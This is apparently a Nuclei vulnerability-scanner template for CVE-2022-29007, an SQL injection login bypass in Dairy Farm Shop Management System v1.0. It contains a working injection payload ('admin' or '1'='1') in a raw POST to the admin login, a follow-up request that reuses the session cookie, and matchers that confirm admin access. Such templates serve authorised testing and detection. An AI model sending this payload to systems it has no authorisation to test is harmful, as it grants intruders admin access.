id: CVE-2022-29007 info: name: Dairy Farm Shop Management System v1.0 - SQLi Authentication Bypass author: TenBird severity: critical description: | Multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel of Dairy Farm Shop Management System v1.0 allows attackers to bypass authentication. reference: - https://www.exploit-db.com/exploits/50365 - https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/ - https://nvd.nist.gov/vuln/detail/CVE-2022-29007 classification: cve-id: CVE-2022-29007 metadata: verified: true tags: cve,cve2022,sqli,auth-bypass requests: - raw: - | POST /dfsms/index.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 username=admin' or '1'='1&password=1&login=login - | GET /dfsms/add-category.php HTTP/1.1 Host: {{Hostname}} cookie-reuse: true matchers-condition: and matchers: - type: word part: body words: - 'Add Product' - 'Admin' - 'DFSMS' condition: and - type: status status: - 200